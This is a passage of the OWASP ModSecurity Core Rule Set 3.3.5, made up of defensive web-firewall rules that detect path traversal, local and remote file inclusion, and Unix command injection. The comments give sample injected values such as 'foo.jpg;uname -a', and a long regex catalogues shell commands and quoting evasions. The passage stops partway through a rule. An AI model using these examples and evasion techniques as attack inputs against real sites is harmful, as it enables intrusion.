    tag:'platform-multi',\
    tag:'attack-lfi',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/255/153/126',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
    setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"

#
# [ Decoded /../ Payloads ]
#
# 930110: counterpart of 930100 working on decoded input. It looks for ".."
# delimited by '/' or '\' (or by the start or end of the value) and uses
# multiMatch together with the listed transformations.
SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?:^|[\\/])\.\.(?:[\\/]|$)" \
    "id:930110,\
    phase:2,\
    block,\
    capture,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\
    msg:'Path Traversal Attack (/../)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-lfi',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/255/153/126',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    multiMatch,\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
    setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"

#
# -=[ OS File Access ]=-
#
# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml
#
# 930120: phrase match of the normalised, lowercased input against the
# entries of lfi-os-files.data.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \
    "id:930120,\
    phase:2,\
    block,\
    capture,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\
    msg:'OS File Access Attempt',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-lfi',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/255/153/126',\
    tag:'PCI/6.5.4',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

#
# -=[ Restricted File Access ]=-
#
# Detects attempts to retrieve application source code, metadata,
# credentials and version control history possibly reachable in a web root.
#
# 930130: phrase match of the normalised, lowercased request filename against
# the entries of restricted-files.data. Only REQUEST_FILENAME is inspected.
SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
    "id:930130,\
    phase:2,\
    block,\
    capture,\
    t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\
    msg:'Restricted File Access Attempt',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-lfi',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/255/153/126',\
    tag:'PCI/6.5.4',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# The paranoia level 2, 3 and 4 sections of this file hold no rules; only the
# per-phase skip rules are present.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
# Target of the skipAfter actions above.
SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI"
modsecurity-crs-3.3.5/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf000066400000000000000000000131701446122515100234500ustar00rootroot00000000000000
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# RFI Attacks
#
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
# When the executing paranoia level is below 1, skip to the
# END-REQUEST-931-APPLICATION-ATTACK-RFI marker (one skip rule per phase).
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
# -=[ Rule Logic ]=-
# These rules look for common types of Remote File Inclusion (RFI) attack methods.
# - URL Contains an IP Address
# - The PHP "include()" Function
# - RFI Data Ends with Question Mark(s) (?)
# - RFI Host Doesn't Match Local Host
#
# -=[ References ]=-
# http://projects.webappsec.org/Remote-File-Inclusion
# http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html
#
# 931100: flags an argument value that starts with a file, ftp(s) or http(s)
# URL whose host part begins with four dot-separated groups of one to three
# digits.
SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \
    "id:931100,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rfi',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/175/253',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# 931110: inspects the URL-decoded query string and request body for one of
# the listed parameter names (or an include( call) directly assigned a file,
# ftp(s) or http(s) URL.
SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?):\/\/" \
    "id:931110,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,\
    msg:'Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rfi',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/175/253',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# 931120: flags an argument value that starts with file, ftp(s) or http(s)
# and ends with one or more question marks.
SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \
    "id:931120,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rfi',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/175/253',\
    ctl:auditLogParts=+E,\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

# When the executing paranoia level is below 2, skip to the
# END-REQUEST-931-APPLICATION-ATTACK-RFI marker (one skip rule per phase).
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
# 931130: for an argument value that is a file, ftp(s) or http(s) URL, the
# first rule stores "." plus the captured host part in
# tx.rfi_parameter_<matched variable name>. The chained rule fires when that
# stored value does not end with "." plus the value of the request's Host
# header, i.e. the URL points to a host other than the one named in the
# request.
SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \
    "id:931130,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-multi',\
    tag:'platform-multi',\
    tag:'attack-rfi',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/175/253',\
    tag:'paranoia-level/2',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL',\
    setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
    chain"
    SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \
        "ctl:auditLogParts=+E,\
        setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
        setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"

# The paranoia level 3 and 4 sections of this file hold no rules; only the
# per-phase skip rules are present.
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
# Target of the skipAfter actions above.
SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI"
modsecurity-crs-3.3.5/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf000066400000000000000000001531401446122515100234440ustar00rootroot00000000000000
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
# When the executing paranoia level is below 1, skip to the
# END-REQUEST-932-APPLICATION-ATTACK-RCE marker (one skip rule per phase).
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
# [ Unix command injection ]
#
# This rule detects Unix command injections.
# A command injection takes a form such as:
#
#   foo.jpg;uname -a
#   foo.jpg||uname -a
#
# The vulnerability exists when an application executes a shell command
# without proper input escaping/validation.
#
# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
#
# To prevent false positives, we look for a 'starting sequence' that
# precedes a command in shell syntax, such as: ; | & $( ` <( >(
# Anatomy of the regexp with examples of patterns caught:
#
# 1. Starting tokens
#
#   ;          ;ifconfig
#   \{         {ifconfig}
#   \|         |ifconfig
#   \|\|       ||ifconfig
#   &          &ifconfig
#   &&         &&ifconfig
#   \n         ;\nifconfig
#   \r         ;\rifconfig
#   \$\(       $(ifconfig)
#   $\(\(      $((ifconfig))
#   `          `ifconfig`
#   \${        ${ifconfig}
#   <\(        <( ifconfig )
#   >\(        >( ifconfig )
#   \(\s*\)    a() ( ifconfig; ); a
#
# 2. Command prefixes
#
#   {          { ifconfig }
#   \s*\(\s*   ( ifconfig )
#   \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+    VARNAME=xyz ifconfig
#   !\s*       ! ifconfig
#   \$         $ifconfig
#
# 3. Quoting
#
#   '          'ifconfig'
#   \"         "ifconfig"
#
# 4. Paths
#
#   [\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/    /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc.
#
# This rule is case-sensitive to prevent FP ("Cat" vs. "cat").
#
# An effort was made to combat evasions by shell quoting (e.g. 'ls',
# 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine
# transformation built-in to deal with this, but unfortunately, it
# replaces ';' characters and lowercases the payload, which is less
# useful for this case. However, emulating the transformation makes
# the regexp more complex.
# # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* # [regexp assembled from util/regexp-assemble/regexp-932100.txt] # \b" \ # # This is the base Rule to prevent Unix Command Injection # Please refer other rules 932105,932106 to know more. # # .932100 # ├── 932105 # ├── 932106 # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:w[\\\\'\"]*p[\\\\'\"]*-[\\\\'\"]*(?:d[\\\\'\"]*(?:o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*m[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*q[\\\\'\"]*u[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|m[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*r)|s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|h[\\\\'\"]*w|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"
]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m|(?:\s|<|>).*)|o[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*(?:t[\\\\'\"]*e|l)[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|d[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|(?:[np]|y[\\\\'\"]*n[\\\\'\"]*x)[\\\\'\"]*(?:\s|<|>).*)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p[\\\\'\"]*2)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*h)|r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*k[\\\\'\"]*s[\\\\'\"]*w|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*(?:p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|h[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*(?:\s|<|>).*|f[\\\\'\"]*l[\\\\'\"]*a[\\\\'\"]*g[\\\\'\"]*s|a[\\\\'\"]*t[\\\\'\"]*t[\\\\'\"]*r|m[\\\\'\"]*o[\\\\'\"]*d)|r[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*b|(?:[cp]|a[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h)|f[\\\\'\"]*(?:i(?:[\\\\'\"]*(?:l[\\\\'\"]*e[\\\\'\"]*(?:t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|(?:\s|<|>).*)|n[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*))?|t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|u[\\\\'\"]*n[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n|(?:e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|c)[\\\\'\"]*(?:\s|<|>).*|o[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|e[\\\\'\"]*(?:n[\\\\'\"]*(?:v(?:[\\\\'\"]*-[\\\\'\"]*u[\\\\'\"]*p[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)?|d[\\\\'\"
]*(?:i[\\\\'\"]*f|s[\\\\'\"]*w))|x[\\\\'\"]*(?:p[\\\\'\"]*(?:a[\\\\'\"]*n[\\\\'\"]*d|o[\\\\'\"]*r[\\\\'\"]*t|r)|e[\\\\'\"]*c[\\\\'\"]*(?:\s|<|>).*)|c[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|s[\\\\'\"]*a[\\\\'\"]*c|v[\\\\'\"]*a[\\\\'\"]*l)|h[\\\\'\"]*(?:t[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|p[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|o[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e|i[\\\\'\"]*d)|(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)[\\\\'\"]*(?:\s|<|>).*|i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*y)|i[\\\\'\"]*(?:p[\\\\'\"]*(?:(?:6[\\\\'\"]*)?t[\\\\'\"]*a[\\\\'\"]*b[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*s|c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g)|r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|f[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|g[\\\\'\"]*(?:(?:e[\\\\'\"]*t[\\\\'\"]*f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c|i[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|u[\\\\'\"]*n[\\\\'\"]*z[\\\\'\"]*i[\\\\'\"]*p|d[\\\\'\"]*b)|a[\\\\'\"]*(?:(?:l[\\\\'\"]*i[\\\\'\"]*a[\\\\'\"]*s|w[\\\\'\"]*k)[\\\\'\"]*(?:\s|<|>).*|d[\\\\'\"]*d[\\\\'\"]*u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r|p[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t|r[\\\\'\"]*(?:c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|d[\\\\'\"]*(?:h[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*i[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*t|(?:i[\\\\'\"]*f[\\\\'\"]*f|u)[\\\\'\"]*(?:\s|<|>).*|(?:m[\\\\'\"]*e[\\\\'\"]*s|p[\\\\'\"]*k)[\\\\'\"]*g|o[\\\\'\"]*(?:a[\\\\'\"]*s|n[\\\\'\"]*e)|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:k[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*r|o[\\\\'\"]*r[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*(?:x[\\\\'\"]*(?:\s|<|>).*|q)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)|j[\\\\'\"]*(?:(?:a[\\\\'\"]*v[\\\\'\"]*a|o[\\\\'\"]*b[\\\\'\"]*s)[
\\\\'\"]*(?:\s|<|>).*|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c)|k[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*l[\\\\'\"]*(?:a[\\\\'\"]*l[\\\\'\"]*l|(?:\s|<|>).*)|(?:G[\\\\'\"]*E[\\\\'\"]*T[\\\\'\"]*(?:\s|<|>)|\.\s).*|7[\\\\'\"]*z(?:[\\\\'\"]*[ar])?)\b" \ "id:932100,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Unix Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Apache 2.2 requires configuration file lines to be under 8kB. # Therefore, some remaining commands have been split off to a separate rule. # For explanation of this rule, see rule 932100. # # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* # [regexp assembled from util/regexp-assemble/regexp-932105.txt] # \b" \ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
